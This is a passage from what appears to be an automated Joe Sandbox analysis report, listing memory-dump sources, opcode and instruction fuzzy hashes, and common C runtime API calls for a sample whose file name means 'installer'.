                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9302b36b025ec877457fbbf1a21bafb2f45ab16812df500e0537ae03573401d4
                                      • Instruction ID: b4305de099a09bec8c85aa7a1a2d0c71f0303fa6b81da7ddf8f364fb7a06fa5d
                                      • Opcode Fuzzy Hash: 9302b36b025ec877457fbbf1a21bafb2f45ab16812df500e0537ae03573401d4
                                      • Instruction Fuzzy Hash: 7951473550D7068BC314DF6CE8409EAB3A1AFC5320F618B3EE495CB8D1EB75552ACB46
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a5df0ff16b053d8fcfcdee403e066c8bbf8aa7f46747348a699df34f7397b1a9
                                      • Instruction ID: 5121b28ea3e259835e431873c259ab079cfdaa0962ac61395ad311ff7eaf342b
                                      • Opcode Fuzzy Hash: a5df0ff16b053d8fcfcdee403e066c8bbf8aa7f46747348a699df34f7397b1a9
                                      • Instruction Fuzzy Hash: 92518D30B483568BD710DF1ED88061AB7E1FF98708F244A6DE99487712E772E906CBD1
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                      • Instruction ID: dda0b7b4ced4ca4c108d35fdc4cf5ee94a00ee5f1191b7fe47787490dd2ad7fd
                                      • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                      • Instruction Fuzzy Hash: 7F3114677A444103CB0CCD3BCC127AFA1579BD422A75ECF396C09DEF95D92CC816454A
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9e60619b53f5733759f851c7e89353584e6ca2cea002716f3001e8b4c6fadb46
                                      • Instruction ID: 0efc4bfc8c612078e46f244633c81a12bbab30eb022041a09f6eb5af75885c13
                                      • Opcode Fuzzy Hash: 9e60619b53f5733759f851c7e89353584e6ca2cea002716f3001e8b4c6fadb46
                                      • Instruction Fuzzy Hash: 73310E73520A050BF301891A8D6CF5A7223EBC2378F198725DA66C7EECFA7D9D468141
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                      • Instruction ID: e6276442c06e83b9cf3adc5c0c470efa14ee9eb1f473a6e4eb5e671c335eca14
                                      • Opcode Fuzzy Hash: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                      • Instruction Fuzzy Hash: F431F773514A050AF310892EC998356F223DBC6378F298365D97587EECEB7ADA07C140
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 339ee744446d112a765928d404ddf207658255a2f736a4a614ed85662a00481a
                                      • Instruction ID: f6d068c31b23fc41e8a4ea9e1209acf6bf597940a5e47a1684731a321a5893bb
                                      • Opcode Fuzzy Hash: 339ee744446d112a765928d404ddf207658255a2f736a4a614ed85662a00481a
                                      • Instruction Fuzzy Hash: 1341AB72A487168FC304EE58EC804FBB3A6EFC8320F904B3DA866871D5D771691AC391
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                                      • Instruction ID: 391662107bf8ac99de8038dea7ebd29093e463a9c45faf458e0a46360bab7f32
                                      • Opcode Fuzzy Hash: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                                      • Instruction Fuzzy Hash: 3041D4B29047068FD704DF19C8905AAB3E4FF88318F454A2DED9AA7341E335FA15CB81
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 098c659f76e41217d8669f6238bf7423f4d33ff929d6c702424d2a71048e67eb
                                      • Instruction ID: db400e9a014e9f17070cc4246fddd0cc5eff7b08bcc6a0660ca92899114c449f
                                      • Opcode Fuzzy Hash: 098c659f76e41217d8669f6238bf7423f4d33ff929d6c702424d2a71048e67eb
                                      • Instruction Fuzzy Hash: E6318631A047128BD728CA39D4500ABB3E3EFC5318B54CB3DC0568B999EBB5600FCB82
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                      • Instruction ID: 213653df3d48642ea7fac22bcd9688b0be58e51da89769fb72b05f617351ea88
                                      • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                      • Instruction Fuzzy Hash: 38219077320A0647E74C8A38D83737532D0A705318F98A22DEA6BCE2C2E73AC457C385
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 64767f10f9c171ab935b0bf025eacf772035bcd2eb799dcdd82e02b09b12ee02
                                      • Instruction ID: 078601365e5b9c721a00bf704c69355fc67cf20728e20f000f6a2303b0aa5c5c
                                      • Opcode Fuzzy Hash: 64767f10f9c171ab935b0bf025eacf772035bcd2eb799dcdd82e02b09b12ee02
                                      • Instruction Fuzzy Hash: 962190327193428FC308DF58D89096BBBE6FFC9210F15857EE9848B351D635E906CB91
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 48f6a5bdde1c9cea4668397cf668c04db0f725afa69fc77866d080b4e5372864
                                      • Instruction ID: 12cb02ced5cc2528b470c3a38e9a5790968867dc9c041ee090c622432d0e369f
                                      • Opcode Fuzzy Hash: 48f6a5bdde1c9cea4668397cf668c04db0f725afa69fc77866d080b4e5372864
                                      • Instruction Fuzzy Hash: 1E1190723183864BC308CE1DDC90966BBE5FBC9300F24497EE985C7341C625D907DB95
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 94bd1a651729923c4c8d3d4bf4c81e233e4e8cf0a286e62590c7b03c1869421d
                                      • Instruction ID: bb3370a6efcd9961e8c9bcdbbdf1b07d2c60f53b81877e4a9589a6005c932a01
                                      • Opcode Fuzzy Hash: 94bd1a651729923c4c8d3d4bf4c81e233e4e8cf0a286e62590c7b03c1869421d
                                      • Instruction Fuzzy Hash: 9701125529668989DB81DA79D490748FE90FB56202F9CC3E4D08CCBF43D589C54AC3A1
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eb16ab2991c322ab825eb8aa06eb7d0ec145a81678f8d2ea9e766c99cb928e6a
                                      • Instruction ID: 5b6e9803475034fb61f2686e618c31c6bf3d0e9869bb94a7fb96a333a4d5554e
                                      • Opcode Fuzzy Hash: eb16ab2991c322ab825eb8aa06eb7d0ec145a81678f8d2ea9e766c99cb928e6a
                                      • Instruction Fuzzy Hash: 30F0A031A103609BCB22CB59D401F8973B8EB05BA9F114096E811AB640C2B0ED00C7D1
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                      • Instruction ID: 6a7680fcdf9029db23be2f7dd3b67e765e45809ba5ac565a8b6162676dd16f7a
                                      • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                      • Instruction Fuzzy Hash: 1BE08C329122B8EBCB20CB98D904D8AF3FCEB45B44B1100A6F925D3640C270EE00CBE0
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                      • Instruction ID: 9e775abeed684ca77467d17cca6977048c68fff2285a19e0a564aa4dd6adc1c9
                                      • Opcode Fuzzy Hash: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                      • Instruction Fuzzy Hash: 27C002F6609606AF970CCF1FA480415FBE9FAD8321324C23FA02DC3700C77198258B64
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                      • API String ID: 3519838083-609671
                                      • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                      • Instruction ID: 07f9fb416b7a431f16bbcabf6836f9cd3226b83705261e66461361655b940dc9
                                      • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                      • Instruction Fuzzy Hash: DDD1A271A0428ADFCF01CFA4D980BEEB7B5FF45328F194529E055A3A50DB70E949CB62
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: L$L'K$T'K$\'K$d'K$p'K$)K
                                      • API String ID: 3519838083-3887797823
                                      • Opcode ID: 47b27f50cc51f1a94238cd0256452db9f2d92a2e889979d702001e9d19a1f323
                                      • Instruction ID: 60ce1d15810092af7de5adb29b5e26756c3d3b24ad3def4aad0618462bd76846
                                      • Opcode Fuzzy Hash: 47b27f50cc51f1a94238cd0256452db9f2d92a2e889979d702001e9d19a1f323
                                      • Instruction Fuzzy Hash: 89028F709012899FDB15CF64C990ADDFBB5FF05308F5481AAD069A7B50DB30AA8ECF61
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBE8B74
                                        • Part of subcall function 6CBE8AC2: __EH_prolog.LIBCMT ref: 6CBE8AC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: DJ$H K$L K$P K$T K$X K$\ K
                                      • API String ID: 3519838083-3148776506
                                      • Opcode ID: 1e695b17fc03ab30503818bc101f4fbde075140751d540bd7eda0f269636307e
                                      • Instruction ID: 465a5d535af890b2bb29c7672be6836c0737e675a430bf2147bc2d4732bea688
                                      • Opcode Fuzzy Hash: 1e695b17fc03ab30503818bc101f4fbde075140751d540bd7eda0f269636307e
                                      • Instruction Fuzzy Hash: 1E51C9309049C59BCF10EFA8C480AEEB376EF5A78CF10C52BC8655BB40D77A990AC751
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: $ $$ K$, K$.$o
                                      • API String ID: 3519838083-1786814033
                                      • Opcode ID: 8aabfd49f75e4689d5c64928821ac6bb4626587af6c0d6ffd44deb225edb8441
                                      • Instruction ID: 30d6b473b27b21bbedd8cece8c4688e287cee619e038b53bc0d637dea6840d79
                                      • Opcode Fuzzy Hash: 8aabfd49f75e4689d5c64928821ac6bb4626587af6c0d6ffd44deb225edb8441
                                      • Instruction Fuzzy Hash: B8D1B1319042ED8BCF11CFA8D4906EEBBB2FF0D748F244269C555A7A82C7715949CBA2
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 6CB6D1F7
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 6CB6D1FF
                                      • _ValidateLocalCookies.LIBCMT ref: 6CB6D288
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 6CB6D2B3
                                      • _ValidateLocalCookies.LIBCMT ref: 6CB6D308
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 799af0fd9f7368780c13f01da0c7dfc048dbfd020aacaa3fc235e38ef245ced5
                                      • Instruction ID: c74e8ce7f52aed0a8d17dbc31f6e70d00ee793564b2bd7e41e67a0fdc1dda9d0
                                      • Opcode Fuzzy Hash: 799af0fd9f7368780c13f01da0c7dfc048dbfd020aacaa3fc235e38ef245ced5
                                      • Instruction Fuzzy Hash: 0641A534A01298ABCF11CF7AD880ADE7BB5EF45318F248155EC24ABF51D771DA06CBA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: api-ms-$ext-ms-
                                      • API String ID: 0-537541572
                                      • Opcode ID: 204d58fc43b6573ea77ba8c6972230b889d161443e62fded2bea23288775365c
                                      • Instruction ID: 3dbc9d6a6f3ab732ada9b1921bbed814a101014c1674f8dea47982e7fe4864aa
                                      • Opcode Fuzzy Hash: 204d58fc43b6573ea77ba8c6972230b889d161443e62fded2bea23288775365c
                                      • Instruction Fuzzy Hash: 3221D571A06291EBDB719A29CC44A4A3BB8DB037B8F152620EC21B7680E670DD01CBF5
                                      APIs
                                      • GetConsoleCP.KERNEL32(?,6CB7E7C0,?), ref: 6CB7F5E9
                                      • __fassign.LIBCMT ref: 6CB7F7C8
                                      • __fassign.LIBCMT ref: 6CB7F7E5
                                      • WriteFile.KERNEL32(?,6CB891A6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CB7F82D
                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CB7F86D
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CB7F919
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ConsoleErrorLast
                                      • String ID:
                                      • API String ID: 4031098158-0
                                      • Opcode ID: 8d15b4e70b826121b2a8b2f9d9549a11d20ef4195bdd5a1e802310ad26d72f21
                                      • Instruction ID: ca1f11b026548761bd4aa71c93da6800a6dc5e4e8cef9347b9a801bcca947204
                                      • Opcode Fuzzy Hash: 8d15b4e70b826121b2a8b2f9d9549a11d20ef4195bdd5a1e802310ad26d72f21
                                      • Instruction Fuzzy Hash: 63D1CF71D052989FCF21CFA8C9909EDBBB5FF49314F24016AE865BB341D730AA46CB64
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6CA32F95
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6CA32FAF
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA32FD0
                                      • __Getctype.LIBCPMT ref: 6CA33084
                                      • std::_Facet_Register.LIBCPMT ref: 6CA3309C
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA330B7
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                      • String ID:
                                      • API String ID: 1102183713-0
                                      • Opcode ID: 8724a961b42f6fb93dc26a994a5c50eeb975e6fcb38d7ee81a278d0d6e6e095f
                                      • Instruction ID: bba59642b2456c3daca69887ad0c7ecbfa6f4302ebe9c2368f472225772e68fe
                                      • Opcode Fuzzy Hash: 8724a961b42f6fb93dc26a994a5c50eeb975e6fcb38d7ee81a278d0d6e6e095f
                                      • Instruction Fuzzy Hash: B7416AB1E052688FDF00CF86C964BAEB7B0FF45714F084629D859ABB40D734A985CF90
                                      APIs
                                      Memory Dump Source
